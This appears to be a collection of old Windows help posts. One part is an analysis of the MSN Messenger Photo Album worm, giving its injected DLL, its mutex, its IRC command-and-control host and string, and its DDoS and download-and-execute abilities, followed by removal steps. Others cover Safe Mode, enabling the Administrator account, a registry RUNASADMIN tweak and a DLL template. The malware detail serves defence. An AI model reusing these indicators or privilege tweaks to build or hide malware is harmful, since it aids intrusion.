SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices - SystemTools

Go to Start, Run, type: netsh firewall reset and press OK

To enable Task Manager click on Start, Run, type:

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

Then click OK

MSN Messenger Photo Album Virus

(aka Worm.Sedoubot.A , Backdoor.IRCBot.AAQ)

[Description]

When it's executed, the malware will create a file named rdihost.dll in the %Windir%\System32 folder, inject it into explorer.exe and create a mutex with the name: "suckmydick:pomgfuckingstupidgay!!!"

It will create a copy of itself as an archive in the %windir% folder, named "photo album.zip"

Then it will connect to an IRC channel on www.fre[blocked]e8.biz and wait for commands from a malicious attacker. The connection string is "lol lol lol :shadowbot2"
Based on those commands, the Security Center and SharedAccess services can be stopped. It can also download and execute files, or attack other computers.

The attack is of the DDoS (Distributed Denial of Service) type and it is triggered when a command is sent to the compromised system. In a DDoS attack a multitude of compromised systems attack a single target, thereby causing denial of service for the users of the targeted system: the flood of incoming messages essentially forces the target to shut down, denying service to legitimate users.

[Clean]

In order to clean the computer, please restart it in Safe Mode and delete the following files:
%Windir%\photoalbum.zip
%Windir%\system32\rdihost.dll


Removal Tool available here

How to boot in safe mode

Safe mode is a diagnostic mode that the operating system can start in,
with minimal configuration so that system errors can possibly be corrected.
In order to boot in safe mode please do the following:

1. Restart the computer

2. Press on the F8 key every few seconds as the system boots up until the screen
with the Safe Mode option appears.
(If Windows launches before you can choose a safe mode, restart the computer and try again.)

3. You should see a few options but use the arrow keys
to highlight Safe Mode and press the Enter key.

4. The system will now boot into Safe Mode.
(You may receive a prompt asking if you really want to boot into Safe Mode. Choose Yes.)

How to enable the Administrator account in Windows Vista (Ultimate Edition)


Open Control Panel, go to Administrative Tools and open Local Security Policy.
Then open Local Policies and expand the Security Options item, right click on Administrator
account status, select Properties, click on the Enabled option and then click on the OK button.



After you have enabled the Administrator account you need to set a password for it.
In order to do that, follow the steps below:
Open Control Panel, go to Administrative Tools, Computer Management and expand the
Local Users and Groups item. Now right click on the Administrator account and select Set password

Now that you have set a password you can logoff and then logon as Administrator.

Enjoy :)

How to run programs as Administrator in Windows Vista from a restricted user account

Open regedit and navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers

Add a string value whose name is the full path and name of the executable
(e.g. C:\Program Files\Myapp\Myapp.exe)
and whose data is RUNASADMIN

How to create a dll

If you are interested in this post then I assume that you know what a dll is;
if not, you can find a definition here.

Below I will give you an empty framework of what you need to create a dll.

There are two files: mylib.c (that contains your functions) and mylib.def that contains
the functions that you want to make accessible to other programs (the exported functions).

mylib.c
#include <stdio.h>
#include <windows.h>

/* exported function; it is also listed in mylib.def */
__declspec(dllexport) int __stdcall myFunc(void)
{
printf("Text from my dll\n");
return 0;
}


/* DllMain is called by the loader, is not exported, and must have this signature.
   Returning FALSE (0) on DLL_PROCESS_ATTACH makes LoadLibrary fail, so return TRUE. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
return TRUE;
}


The mylib.def will contain:
LIBRARY mylib
EXPORTS
myFunc

Now you need to compile your mylib.c file with the following switches:
cl mylib.c /LD /O2 /Gz /GD /W3 /link advapi32.lib /DLL /NOLOGO /DEF:mylib.def /RELEASE

Enjoy :)